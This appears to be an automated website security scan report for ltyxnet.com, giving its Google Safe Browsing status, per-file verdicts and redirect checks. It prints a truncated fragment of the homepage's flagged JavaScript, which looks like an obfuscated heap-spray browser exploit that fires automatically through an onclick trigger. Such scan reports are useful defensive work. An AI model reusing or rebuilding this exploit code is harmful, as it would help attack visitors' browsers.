Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ltyxnet.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://ltyxnet.com/ | 200 OK Content-Length: 72930 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
var CutePower = anheywangma(AnHey.replace (/CUTEQQ/g,'%u')); var CuteMoney = new Array() var CuteShine = 0x86000 - CutePower.length*2; var sss = Array(472,388,456,128,268,468,464,404,332,420,488,404,128,244,128,136,268,340,336,276,324,324,192,396,192,136,172,136,396,268,340,336,276,324,324,192,396,192,136,172,136,396,136,236,472,388,456,128,268,468,464,404,328,420,412,416,464,128,244,128,388,440,416,404,484,476,388,440,412,436, } } function ahwm() { var CuteLock = document.createElement("BODY"); CuteLock.addBehavior("#default#userData"); document.appendChild(CuteLock); try { for (i=0;i<10;i++) { CuteLock.setAttribute('s',window); } } catch(e) {} window.status+=''; } document.getElementById("evilcute").onclick();
Antivirus reports:
http://ltyxnet.com/pack.js | HTTP/1.1 200 OK Date: Fri, 26 Dec 2014 16:25:08 GMT Accept-Ranges: bytes ETag: "6a4b29739175cd1:a7f69" Server: Apache/2.2.22 (Ubuntu) Content-Length: 178 Content-Location: http://ltyxnet.com/pack.js Content-Type: application/x-javascript Last-Modified: Wed, 08 Aug 2012 18:13:02 GMT X-Powered-By: WAF/2.0 | clean |
http://ltyxnet.com/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://ltyxnet.com/pack.css | HTTP/1.1 200 OK Date: Fri, 26 Dec 2014 16:25:10 GMT Accept-Ranges: bytes ETag: "afe5a4e9175cd1:a7f69" Server: Apache/2.2.22 (Ubuntu) Content-Length: 4910 Content-Location: http://ltyxnet.com/pack.css Content-Type: text/css Last-Modified: Wed, 08 Aug 2012 18:12:00 GMT X-Powered-By: WAF/2.0 | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ltyxnet.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 26 Dec 2014 16:25:03 GMT
Server: Apache/2.2.22 (Ubuntu)
Content-Length: 72930
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQBQCQBB=KONNJPKCDADCGNNNAJEBNMDK; path=/
X-Powered-By: WAF/2.0
...72930 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ltyxnet.com
Referer: http://www.google.com/search?q=ltyxnet.com
Result:
The result is similar to the first query. There are no suspicious redirects found.